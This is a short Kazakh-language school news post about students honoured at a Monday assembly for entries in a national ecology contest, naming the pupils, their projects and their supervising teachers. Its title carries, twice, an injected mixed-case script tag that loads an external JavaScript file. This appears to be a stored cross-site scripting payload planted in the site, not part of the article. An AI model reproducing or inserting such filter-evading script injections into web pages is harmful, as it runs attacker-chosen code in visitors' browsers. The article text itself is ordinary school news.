Дүйсенбілік сап түзеу<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.09.2022 12 қыркүйек күні, Иманжүсіп Құтпанұлы атындағы орта мектебінде дүйсенбілік саптүзеуде республикалық жарыстарға қатысушы оқушылар марапатталды. 2021-2022 оқу жылының соңында 8 маусым күні республикалық экология күні қарсаңында республикалық «Табиғатты аяла!» конкурсы өтті. Бұл конкурсқа мектебіміздің оқушылары белсенділікпен қатысып, өздерінің жобаларын ұсынып, қорғап шықты. «Қазақстанның флорасы мен фаунасының 3D атласы» номинациясы бойынша 7 «Ә» сынып оқушысы Түменбай Айшабибі Медеуқызы «Тұран жолбарысы» тақырыбындағы жобасын ұсынды. Жетекшісі информатика пәнінің мұғалімі Лесбекова Улданай Анарбековна. «Zhasyl El» номинациясы бойынша 8 «В» сынып оқушысы Хусайн Шахизат «Жоғары биіктіктегі жел генераторы» тақырыбындағы жобасымен экологиялық мәселе көтерді. Жетекшісі: физика пәнінің мұғалімі Алтаев Нұрлан Алтайұлы. «GREEN OASES» номинациясы бойынша 9 Ә сынып оқушысы Заит Бейбарыс Әміржанұлы «Мектеп ауласының ландшафтық дизайны» тақырыбында жобасын қорғады. Жетекшісі: география пәнінің мұғалімі Муратхан Аккуль. «Экотеатр» номинациясы бойынша «Ғарыш ғаламаты» театрландырылған көріністі 8 В сынып оқушылары Тәжімұрат Жанель, Азденбаева Алуа, Баян Алдияр, Берикбол Темирлан көрсетті. Жетекшісі: Шыназарова Лаура Ахановна. Осындай конкурсқа қатысқан барлық оқушыларды, оларды дайындаған жетекшілерін құттықтаймыз! Шығармашылық табыстар тілей отырып, жоғары белестерге талмай жете берулеріне тілектеспіз! Директордың бейіндік оқыту ісі жөніндегі орынбасары: Абдрахманова А.Е.
Просмотров: 407


Пікір қосу



Деректерді қолтаңбаға қосу